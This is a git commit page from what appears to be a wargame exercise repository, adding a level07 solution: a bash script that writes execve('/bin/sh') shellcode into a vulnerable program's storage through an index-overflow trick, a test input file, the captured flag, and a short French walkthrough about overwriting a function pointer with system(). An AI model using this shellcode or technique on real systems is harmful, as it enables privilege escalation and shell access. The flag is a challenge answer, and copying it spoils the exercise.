gbrochar
/
OverRide
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

feat: level07 + level08 elf

This commit is contained in:
gbrochar 2025-06-25 17:41:02 +02:00
parent 3cf1fbf6b9
commit 8b91fc4f30
5 changed files with 103 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
level07/Ressources/script.sh Executable file
View File

@ -0,0 +1,45 @@
#!/bin/bash
# shellcode is :
# \x31\xc0\xb0\x46
# \x31\xdb\x31\xc9
# \xcd\x80\xeb\x16
# \x5b\x31\xc0\x88
# \x43\x07\x89\x5b
# \x08\x89\x43\x0c
# \xb0\x0b\x8d\x4b
# \x08\x8d\x53\x0c
# \xcd\x80\xe8\xe5
# \xff\xff\xff\x2f
# \x62\x69\x6e\x2f
# \x73\x68
IFS=''
shellcode=(0x46b0c031 0xc931db31 0x16eb80cd 0x88c0315b 0x5b890743 0x0c438908 0x4b8d0bb0 0x0c538d08 0xe5e880cd 0x2fffffff 0x2f6e6962 0x00006873)
bit_mask=2147483691
init_addr=43
for ((i = 0; i < ${#shellcode[@]}; i++)); do
echo "store"
echo "$(( ${shellcode[$i]} ))"
if (( (i + init_addr) % 3 == 0)); then
echo "$(( i + bit_mask ))"
else
echo "$((i + init_addr))"
fi
done
echo "store"
echo "$(( 0xffffd600 ))"
echo "$(( -1040108880 ))"
echo "read"
#for i in $(seq 0 11); do
# echo "store"
# echo "${shellcode[$i]}"
# echo $(($i + $bit_mask))
#done

42
level07/Ressources/test.txt Normal file
View File

@ -0,0 +1,42 @@
store
1185988657
43
store
3375487793
44
store
384532685
2147483693
store
2294296923
46
store
1535706947
47
store
205752584
2147483696
store
1267534768
49
store
206802184
50
store
3857219789
2147483699
store
805306367
52
store
795765090
53
store
26739
2147483702
store
4294956544 (-16 pour le vrai 28 au lieu de 44)
-1040108880
store
42
42

1
level07/flag Normal file
View File

@ -0,0 +1 @@
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC

15
level07/walkthrough Normal file
View File

@ -0,0 +1,15 @@
-1040108880On peut ecrire que 8 octets sur 12
"/bin/sh" c'est 8 char avec le '\0' donc ok pour le modulo
"/bin" => 0x2F62696E => 794978670
"/sh\0" => 0x2F736800 => 796092416
system on peut le call avec l'addresse, puis l'argument vers esp+quelque chose.
-1040108880 Index a store avec 4159090384 (0xf7e6aed0 ou system)
ca override le plt/got de puts
override esp pour avoir le bon argument format addr de system BLANC (modulo 3) addr de /bin/sh

BIN
level08/Ressources/level08 Executable file
View File

Binary file not shown.